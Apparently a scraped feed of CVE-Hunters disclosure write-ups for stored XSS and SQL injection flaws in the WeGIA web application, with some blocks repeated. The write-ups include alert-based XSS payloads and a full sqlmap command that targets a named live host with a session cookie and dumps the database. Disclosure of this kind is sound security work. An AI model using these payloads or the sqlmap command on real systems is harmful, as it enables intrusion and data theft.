href="https://github.com/Sec-Dojo-Cyber-House"><img src="sdch.png" width="120"/ /></a> </p> <h2 id="written-by">Written by </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <h2 id="contributors">Contributors </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Wed, 04 Jun 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-30366/ https://www.cvehunters.com/p/cve-2025-30366/ <h2 id="cve-2025-30366-multiples-stored-xss-in-personalizacaophp">CVE-2025-30366: Multiples Stored XSS in <code>personalizacao.php</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-30366" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-30366</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples stored Cross-Site Scripting (XSS) vulnerability was identified in the WeGIA application. This vulnerability allows unauthorized scripts to be executed within the user's browser context. Stored XSS is particularly critical, as the malicious code is permanently stored on the server and executed whenever a compromised page is loaded, affecting all users accessing this page.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>html/personalizacao.php</code></p><h2 id="cve-2025-30366-multiples-stored-xss-in-personalizacaophp">CVE-2025-30366: Multiples Stored XSS in <code>personalizacao.php</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-30366" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-30366</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples stored Cross-Site Scripting (XSS) vulnerability was identified in the WeGIA application. This vulnerability allows unauthorized scripts to be executed within the user's browser context. Stored XSS is particularly critical, as the malicious code is permanently stored on the server and executed whenever a compromised page is loaded, affecting all users accessing this page.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>html/personalizacao.php</code></p> <p>Parameters: <code>Titulo</code>, <code>Subtitulo</code>, <code>Conheça</code>, <code>Objetivo</code>, <code>Rodape</code></p> <h2 id="poc">POC </h2><p style="text-align: justify;">To reproduce the issue, insert the following payloads into the vulnerable field of the URL and save the changes:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'Alert: XSS'</span><span class="p">);</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">After saving the input, the injected script will be stored on the server and automatically executed for any user accessing the <code>home page</code> and <code>personalizacao.php</code>, confirming the stored XSS.</p> <p>File: <code>html/personalizacao.php</code></p> <p>Payload:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'Alert: XSS'</span><span class="p">);</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p>Trigger in: <code>Home Page</code> and <code>personalizacao.php</code></p> <p>Parameters: <code>titulo</code>, <code>subtitulo</code>, <code>conheça</code>, <code>objetivo</code>, <code>rodape</code></p> <p><img src="/p/cve-2025-30366/393505214-e93ca486-9bbf-47bd-a2df-76daeac5924d.png" width="1126" height="342" srcset="/p/cve-2025-30366/393505214-e93ca486-9bbf-47bd-a2df-76daeac5924d_hu_313be0c57ac23705.png 480w, /p/cve-2025-30366/393505214-e93ca486-9bbf-47bd-a2df-76daeac5924d_hu_ade2770e134cbf73.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="329" data-flex-basis="790px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> All users accessing the affected pages (<code>home page</code> and <code>personalizacao.php</code>), as the malicious script is stored on the server and executed automatically in their browsers. </br> <p>Administrators who interact with the vulnerable fields may also be affected, potentially leading to account takeover if sensitive cookies or session tokens are stolen.</br></p> <p>The application itself, as attackers can use XSS to deface content, redirect users, or perform actions on behalf of authenticated users.</p> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-pwr9-fr8r-8h48" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-pwr9-fr8r-8h48</a></p> <h2 id="reporter">Reporter </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Thu, 27 Mar 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-30367/ https://www.cvehunters.com/p/cve-2025-30367/ <h2 id="cve-2025-30367-sql-injection-endpoint-controlphp-parameter-nextpage">CVE-2025-30367: SQL Injection endpoint <code>control.php</code> parameter <code>nextPage</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-30367" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-30367</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was identified in the WeGIA application, specifically in the <code>control.php</code> endpoint. This vulnerability allows attackers to execute arbitrary SQL commands in the database, allowing unauthorized access to sensitive information. During the exploit, it was possible to perform a complete dump of the application's database, highlighting the severity of the flaw.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>WeGIA/controle/control.php?metodo=listarUm&nomeClasse=SaudeControle&nextPage=<payload>&id=1</code></p><h2 id="cve-2025-30367-sql-injection-endpoint-controlphp-parameter-nextpage">CVE-2025-30367: SQL Injection endpoint <code>control.php</code> parameter <code>nextPage</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-30367" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-30367</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was identified in the WeGIA application, specifically in the <code>control.php</code> endpoint. This vulnerability allows attackers to execute arbitrary SQL commands in the database, allowing unauthorized access to sensitive information. During the exploit, it was possible to perform a complete dump of the application's database, highlighting the severity of the flaw.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>WeGIA/controle/control.php?metodo=listarUm&nomeClasse=SaudeControle&nextPage=<payload>&id=1</code></p> <p>Parameter: <code>nextPage</code></p> <p style="text-align: justify;">The application does not perform proper validation or sanitization on the id parameter, allowing an attacker to manipulate SQL queries directly. This flaw makes it possible to execute malicious statements in the database. During testing, the extraction of sensitive data through the exploit was confirmed.</p> <h2 id="poc">POC </h2><h3 id="payload-sqlmap">Payload (sqlmap): </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> sqlmap -u "https://comfirewall.wegia.org:8000/WeGIA/controle/control.php?metodo=listarUm&nomeClasse=SaudeControle&nextPage=../html/saude/profile_paciente.php?id_fichamedica=1&id=1" --dbms=mysql --cookie="_ga_F8DXBXLV8J=GS1.1.1733782455.11.1.1733782568.60.0.0; _ga=GA1.1.552051356.1730893405; PHPSESSID=tc79og6t5lr33d4tjv7ct1o9pg" --dump </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-30367/394311504-0df8a936-c559-42e6-806d-3c9982dfede1.png" width="1900" height="320" srcset="/p/cve-2025-30367/394311504-0df8a936-c559-42e6-806d-3c9982dfede1_hu_bc742d5220a6ae14.png 480w, /p/cve-2025-30367/394311504-0df8a936-c559-42e6-806d-3c9982dfede1_hu_9af90e89d0280d81.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="593" data-flex-basis="1425px" /></p> <p style="text-align: justify;">Using sqlmap an attacker could dump the entire database information from WeGIA.</p> <p style="text-align: justify;">Database: wegia</br> Table: funcionario_docfuncional</p> <p><img src="/p/cve-2025-30367/394312112-9469b854-ee27-45f6-b6fc-01b15ef66e1c.png" width="647" height="342" srcset="/p/cve-2025-30367/394312112-9469b854-ee27-45f6-b6fc-01b15ef66e1c_hu_6117a52c8b556d2f.png 480w, /p/cve-2025-30367/394312112-9469b854-ee27-45f6-b6fc-01b15ef66e1c_hu_ea29f296d0926c04.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="189" data-flex-basis="454px" /></p> <p style="text-align: justify;">Database: wegia</br> Table: pessoa</p> <p><img src="/p/cve-2025-30367/394313600-943e8f8f-87f5-4c79-8642-832342e8fbc0.png" width="1906" height="235" srcset="/p/cve-2025-30367/394313600-943e8f8f-87f5-4c79-8642-832342e8fbc0_hu_e9c3a498acd0f755.png 480w, /p/cve-2025-30367/394313600-943e8f8f-87f5-4c79-8642-832342e8fbc0_hu_69c3b0e6a6229391.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="811" data-flex-basis="1946px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Unauthorized access to sensitive data: An attacker can access confidential information such as credentials, personal or financial data.</li> <li>Compromise of user accounts: Using stolen credentials, attackers can gain full access to the application and perform actions on behalf of legitimate users.</li> <li>Data exfiltration: Possibility of stealing large volumes of information by dumping entire database tables.</li> <li>Reputational damage: Exposing customer data or business information can significantly harm the organization's image.</li> <li>Execution of chain attacks: Obtained information can be used to carry out new attacks, such as targeted phishing or attacks on interconnected systems.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-7j9v-xgmm-h7wr" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-7j9v-xgmm-h7wr</a></p> <h2 id="reporter">Reporter </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Thu, 27 Mar 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-29782/ https://www.cvehunters.com/p/cve-2025-29782/ <h2 id="cve-2025-29782-cross-site-scripting-xss-stored-endpoint-adicionar_tipo_docs_atendidophp-parameter-tipo">CVE-2025-29782: Cross-Site Scripting (XSS) Stored endpoint <code>adicionar_tipo_docs_atendido.php</code> parameter <code>tipo</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-29782" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-29782</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>adicionar_tipo_docs_atendido.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>tipo</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /dao/adicionar_tipo_docs_atendido.php</code></p><h2 id="cve-2025-29782-cross-site-scripting-xss-stored-endpoint-adicionar_tipo_docs_atendidophp-parameter-tipo">CVE-2025-29782: Cross-Site Scripting (XSS) Stored endpoint <code>adicionar_tipo_docs_atendido.php</code> parameter <code>tipo</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-29782" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-29782</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>adicionar_tipo_docs_atendido.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>tipo</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /dao/adicionar_tipo_docs_atendido.php</code></p> <p>Parameter: <code>tipo</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>adicionar_tipo_docs_atendido.php</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">POC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="nb">document</span><span class="p">.</span><span class="nx">body</span><span class="p">.</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="s1">'<img src=x onerror=alert("XSS")>'</span><span class="p">;</span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-29782/418279224-c23a2df8-d696-4484-906b-4c5bc28b187b.png" width="1030" height="430" srcset="/p/cve-2025-29782/418279224-c23a2df8-d696-4484-906b-4c5bc28b187b_hu_70ca78f911d74ca4.png 480w, /p/cve-2025-29782/418279224-c23a2df8-d696-4484-906b-4c5bc28b187b_hu_869a393717f2392f.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="239" data-flex-basis="574px" /></p> <p><img src="/p/cve-2025-29782/418279230-621c5b71-f0b7-4b0b-814b-57dcca94c5e4.png" width="1133" height="263" srcset="/p/cve-2025-29782/418279230-621c5b71-f0b7-4b0b-814b-57dcca94c5e4_hu_85c5c6b2acd962ab.png 480w, /p/cve-2025-29782/418279230-621c5b71-f0b7-4b0b-814b-57dcca94c5e4_hu_723c3d8073bcf1d9.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="430" data-flex-basis="1033px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-5x5w-5c99-vr8h" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-5x5w-5c99-vr8h</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <h2 id="contributors">Contributors </h2><p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Fri, 14 Mar 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-27417/ https://www.cvehunters.com/p/cve-2025-27417/ <h2 id="cve-2025-27417-cross-site-scripting-xss-stored-endpoint-adicionar_status_atendidophp-parameter-status">CVE-2025-27417: Cross-Site Scripting (XSS) Stored endpoint <code>adicionar_status_atendido.php</code> parameter <code>status</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-27417" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-27417</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>adicionar_status_atendido.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>status</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /dao/adicionar_status_atendido.php</code></p><h2 id="cve-2025-27417-cross-site-scripting-xss-stored-endpoint-adicionar_status_atendidophp-parameter-status">CVE-2025-27417: Cross-Site Scripting (XSS) Stored endpoint <code>adicionar_status_atendido.php</code> parameter <code>status</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-27417" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-27417</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>adicionar_status_atendido.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>status</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /dao/adicionar_status_atendido.php</code></p> <p>Parameter: <code>status</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>adicionar_status_atendido.php</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">POC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="nb">document</span><span class="p">.</span><span class="nx">body</span><span class="p">.</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="s1">'<img src=x onerror=alert("XSS")>'</span><span class="p">;</span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-27417/402950010-34f7ccad-b6f2-41cd-9e85-3c50bba2329e.png" width="1041" height="347" srcset="/p/cve-2025-27417/402950010-34f7ccad-b6f2-41cd-9e85-3c50bba2329e_hu_e4d83d478a253d2f.png 480w, /p/cve-2025-27417/402950010-34f7ccad-b6f2-41cd-9e85-3c50bba2329e_hu_54ed63879b01a596.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="300" data-flex-basis="720px" /></p> <p><img src="/p/cve-2025-27417/402947687-b239a5c3-fabd-414a-8be6-ef1974ecad1f.png" width="1359" height="289" srcset="/p/cve-2025-27417/402947687-b239a5c3-fabd-414a-8be6-ef1974ecad1f_hu_bc4b9ee997aed5a3.png 480w, /p/cve-2025-27417/402947687-b239a5c3-fabd-414a-8be6-ef1974ecad1f_hu_19686a33738656f3.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="470" data-flex-basis="1128px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-j3p8-xww6-wvqh" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-j3p8-xww6-wvqh</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <h2 id="contributors">Contributors </h2><p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 03 Mar 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-27418/ https://www.cvehunters.com/p/cve-2025-27418/ <h2 id="cve-2025-27418-cross-site-scripting-xss-stored-endpoint-adicionar_tipo_atendidophp-parameter-tipo">CVE-2025-27418: Cross-Site Scripting (XSS) Stored endpoint <code>adicionar_tipo_atendido.php</code> parameter <code>tipo</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-27418" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-27418</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>adicionar_tipo_atendido.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>tipo</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /dao/adicionar_tipo_atendido.php </code></p><h2 id="cve-2025-27418-cross-site-scripting-xss-stored-endpoint-adicionar_tipo_atendidophp-parameter-tipo">CVE-2025-27418: Cross-Site Scripting (XSS) Stored endpoint <code>adicionar_tipo_atendido.php</code> parameter <code>tipo</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-27418" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-27418</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>adicionar_tipo_atendido.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>tipo</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /dao/adicionar_tipo_atendido.php </code></p> <p>Parameter: <code>tipo</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>adicionar_tipo_atendido.php</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">POC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="nb">document</span><span class="p">.</span><span class="nx">body</span><span class="p">.</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="s1">'<img src=x onerror=alert("XSS")>'</span><span class="p">;</span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-27418/402950225-75ac228d-4bf1-4206-8185-fc816d4de5fd.png" width="886" height="339" srcset="/p/cve-2025-27418/402950225-75ac228d-4bf1-4206-8185-fc816d4de5fd_hu_8ef863f771eebaf3.png 480w, /p/cve-2025-27418/402950225-75ac228d-4bf1-4206-8185-fc816d4de5fd_hu_86adf8a0930c3439.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="261" data-flex-basis="627px" /></p> <p><img src="/p/cve-2025-27418/402950244-748c2062-52aa-43dc-a642-d01e0cd1df43.png" width="1359" height="289" srcset="/p/cve-2025-27418/402950244-748c2062-52aa-43dc-a642-d01e0cd1df43_hu_bc4b9ee997aed5a3.png 480w, /p/cve-2025-27418/402950244-748c2062-52aa-43dc-a642-d01e0cd1df43_hu_19686a33738656f3.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="470" data-flex-basis="1128px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-ffcg-qr75-98mg" target="_blank" rel="noopener" 